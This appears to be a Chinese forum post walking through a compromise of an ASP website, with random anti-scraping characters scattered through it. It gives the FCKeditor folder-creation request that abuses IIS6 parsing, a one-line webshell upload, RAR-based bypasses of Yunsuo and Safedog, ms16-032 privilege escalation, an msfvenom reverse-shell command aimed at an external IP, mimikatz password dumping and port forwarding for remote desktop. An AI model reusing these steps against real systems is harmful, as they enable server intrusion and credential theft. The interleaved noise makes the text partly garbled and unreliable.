|
, O3 S1 ?% a* V
. H Q6 L- j% {) R
2 P4 ]# C9 C/ w; Q. D; A% W- D& i. g 9 ~7 m6 Y6 p5 E5 a" }3 ^, S% o. W
| % O- t* B8 H8 i
3 B x2 V, y Q( q0 }* o N$ h
- t. I' @9 V3 H" V( g一、 利用getwebshell篇
+ x, S6 ^5 [" K, B6 p6 @
2 ]$ S& R% |. F: O% A
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
$ q& E0 V9 h" t2 }; I* s2 m
4 _$ D9 B$ v2 l6 M/ E# J
# L7 q' Q9 U r3 L7 a6 @7 S3 I* F4 m下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 F# {* B5 m6 I5 A# R: D
: d0 B3 Z' p m% B1 Z9 y# W+ Y下面我们构造一个asp目录,如:
2 q$ \/ k2 J& q _8 E+ F( v4 b 8 ?3 g# S" t, J( W
5 a' C9 X: n( g. F# P
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " k- r0 Q& \( {" @4 m$ h
( U- D# {% x% x* N" M2 `& ^
9 G' V) h3 e: s6 @
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
5 K5 L2 q7 ?( V" N
]/ H+ ^9 b% h# O1 E
一、 绕过安全狗云锁提权并且加账号
; Z4 y# e' @, C
( t) p# {6 d/ B5 O9 x& Z没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
3 `+ e3 g; d0 o4 @# y
" y2 H- n5 Q' r$ s如图:
9 E+ I7 i8 z( D! a' X5 P6 g) V5 O
( o- M7 I+ y' n5 L
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
/ H+ s8 q4 U# }$ Q" ^
! v; _6 r% \! ^4 ]3 f6 B一、 利用metasploit
' d- o1 k$ A+ [5 P" W( d, C
9 j+ ^. `( o: D" _8 ?, X4 j j
首先用pentestbox生成一个64位的payload如下命令
* X& m' M5 ~+ L. d5 k2 [6 O0 x n
* | `& s6 j) l V+ l. @msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
) P/ I5 ?; I K7 f9 ~# A9 E
- T7 C2 Q2 d% _/ T& ?6 `* U为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
& B" H0 n X. c8 o
7 i6 x0 I1 ?9 S2 |! B9 y* s下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
) }6 u% v- g9 [8 T9 S
" @) `) g. V$ {, l A* {下面我们来做一个监听如下命令:
) _, T* u" t6 \. G/ d. e9 D+ `
7 E B3 c2 ]0 I; I
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
+ o- G! P6 d$ ?$ [; L! f) N3 o R( V* g1 w5 T3 w* B( [
, n/ M4 Y2 F. ?' B- P3 y* T |
( s" P8 ^9 f2 e
8 P& C! g3 Z9 t9 c5 W, X) p
+ y+ K9 `1 x3 ?) w+ K . B6 d- [, C5 c3 L7 e4 x0 K, Z
* u8 |* M( {& [! t
4 h8 @6 J a3 Q
8 m- G4 ~; l: m+ @ g# d
6 u {) F5 M! n- ^* F/ `9 [" ]
, M. j8 l. s& u/ h
) f+ }5 Y3 d. V8 n! ^
" w- z7 N2 h7 S( ]4 N, b6 W$ e
7 U. E+ k$ V r% K% n% R, f8 y, ?; ~6 t' u; [/ o+ n# p) y
7 q2 b: p/ ]7 R, f1 {) K. F6 c
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06